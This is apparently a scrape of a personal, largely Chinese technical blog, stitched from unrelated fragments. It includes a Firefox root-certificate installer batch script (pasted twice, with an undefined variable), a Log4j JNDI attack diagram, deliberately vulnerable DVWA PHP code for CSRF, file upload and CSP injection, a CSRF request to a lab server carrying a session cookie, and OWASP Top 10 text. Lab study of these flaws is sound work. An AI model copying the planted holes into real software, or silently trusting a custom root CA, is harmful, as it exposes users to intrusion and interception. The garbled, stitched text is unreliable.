-N Create a new certificate database -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-T Reset the Key database or token -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -h token-name Token to reset (default is internal)
-O Print the chain of a certificate -n cert-name The nickname of the cert to modify -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-R Generate a certificate request (stdout) -s subject Specify the subject name (using RFC1485) -o output-req Output the cert request to this file -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -f pwfile Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -a Output the cert request in ASCII (RFC1113); default is binary
-V Validate a certificate -n cert-name The nickname of the cert to Validate -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]") -e Check certificate signature -u certusage Specify certificate usage: C SSL Client V SSL Server S Email signer R Email Recipient -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-S Make a certificate and add to database -n key-name Specify the nickname of the cert -s subject Specify the subject name (using RFC1485) -c issuer-name The nickname of the issuer cert -t trustargs Set the certificate trust attributes (see -A above) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled
set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg%" ( copy "%source_file_cfg%" "%dest_dir_cfg%" ) else ( echo Directory %dest_dir_cfg% does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg_x86%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg_x86%" ( copy "%source_file_cfg%" "%dest_dir_cfg_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set source_file_js=C:\firefoxinstallcert\local-settings.js set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js%... if exist "%source_file_js%" ( if exist "%dest_dir_js%" ( copy "%source_file_js%" "%dest_dir_js%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. ) set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js_x86%... if exist "%source_file_js%" ( if exist "%dest_dir_js_x86%" ( copy "%source_file_js%" "%dest_dir_js_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. )
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled
::profiles默认配置文件目录 set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles" ::搜索存在default字符串的文件夹,即profiles配置文件夹 set "searchString=default" set source_user_js=C:\firefoxinstallcert\user.js ::将user.js文件拷贝到配置文件目录
IF EXIST %parentFolder% ( for /d %%F in ("%parentFolder%\*") do ( echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1 if errorlevel 1 ( echo default Folder not found. ) else ( echo default Folder found. rem 拼接全路径 set "all_default_path=%parentFolder%\%%~nxF" echo !all_default_path! copy "%source_user_js%" !all_default_path! ) ) ) ELSE ( echo no ) goto :eof pause
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
<pre class="mermaid">graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious class] G --> H[Attacker gains<br>server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;</pre>
graph LR A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?} C -->|Yes| D[Execute JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to attacker's server] F --> G[Download & execute malicious class] G --> H[Attacker gains server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;
sequenceDiagram前端->>前端: 用户首次打开前端页面前端->>后台: version : 0 请求同步数据后台->>前端: 返回数据,同时携带最大的versionnote right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections Blind SQL and Blind OS Command injection Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL) Cross-Site Scripting (XSS) and Cross-Site Tracing (XST) Cross-Site Request Forgery (CSRF) AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL) Malicious, unrestricted file uploads and backdoor files Authentication, authorization and session management issues Arbitrary file access and directory traversals Local and remote file inclusions (LFI/RFI) Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,... HTTP parameter pollution and HTTP response splitting Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues Unvalidated redirects and forwards, and cookie poisoning Cookie poisoning and insecure cryptographic storage Server Side Request Forgery (SSRF) XML External Entity attacks (XXE) And much much much more…
// Checks to see where the request came from if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ];
对referer进行了检查
1 2 3 4 5 6 7 8 9
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 Host: 49.232.78.252:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Referer: http://49.232.78.252:81/vulnerabilities/csrf/ Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium Upgrade-Insecure-Requests: 1
// Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo'<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo"<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } }
// Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );
// Did the CAPTCHA fail? if( !$resp ) { // What happens when the CAPTCHA was entered incorrectly $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo" <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> <form action=\"#\" method=\"POST\"> <input type=\"hidden\" name=\"step\" value=\"2\" /> <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> <input type=\"submit\" name=\"Change\" value=\"Change\" /> </form>"; } else { // Both new passwords do not match. $html .= "<pre>Both passwords must match.</pre>"; $hide_form = false; } } }
// Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new );
// Feedback for the end user echo"<pre>Password Changed.</pre>"; } else { // Issue with the passwords matching echo"<pre>Passwords did not match.</pre>"; $hide_form = false; }
?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> ';
递归方法 classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: m=len(matrix) if m==0orlen(matrix[0])==0: return [] n=len(matrix[0]) newlist=matrix[0] if m>1:
for i inrange(1,m): newlist.append(matrix[i][n-1])
for j inrange(n-2,-1,-1): newlist.append(matrix[m-1][j]) if n>1: for i inrange(n-2,0,-1): newlist.append(matrix[i][0]) M=[] for k inrange(1,m-1): t=matrix[k][1:-1] M.append(t)
思路清晰方法: classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: res=[] iflen(matrix)==0: return [] #定义四个边界点 left=0 right=len(matrix[0])-1 top=0 bottom=len(matrix)-1 #在不超过边界的条件下,进行一轮循环 while (top<bottom and left<right): for i inrange(left,right): res.append(matrix[top][i]) for i inrange(top,bottom): res.append(matrix[i][right]) for i inrange(right,left,-1): res.append(matrix[bottom][i]) for i inrange(bottom,top,-1): res.append(matrix[i][left]) left+=1 top+=1 right-=1 bottom-=1 #如果剩余1行或1列:left=0 right1 if top==bottom: for i inrange(left,right+1): res.append(matrix[top][i]) elif left==right: for i inrange(top,bottom+1): res.append(matrix[i][left]) return res
任何多项式可以写为:f(x)=q(x)g(x)+r(x) r(x)称为余式 r(x)=f(x) mod g(x)
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
系数在GF(p)中,以素多项式取模的多项式构成一个域
欧几里得算法
1 2 3 4 5 6 7
a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b 假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。 而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r 因此d也是b,a mod b的公约数 假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数, 进而d|a.因此d也是a,b的公约数 因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。
1 2 3 4 5
对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) 同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b) 由此可知:gcd(a,b)=gcd(a-b,b) 因为总有整数n,使得 a - n*b = a mod b, 所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark FA2=fft2(FAO); G=(FA2-FA)/alpha; GG=G; fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(M(i),N(j),:)=G(i,j,:); end end fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:); end end figure,imshow(GG);title('extracted watermark'); %imwrite(uint8(GG),'extracted watermark.jpg');
The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
注入
失效的身份验证
敏感信息泄露
XML外部实体(XXE)
失效的访问控制
安全配置错误
跨站脚本(XSS)
不安全的反序列化
使用含有已知漏洞的组件
不足的日志记录和监控
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.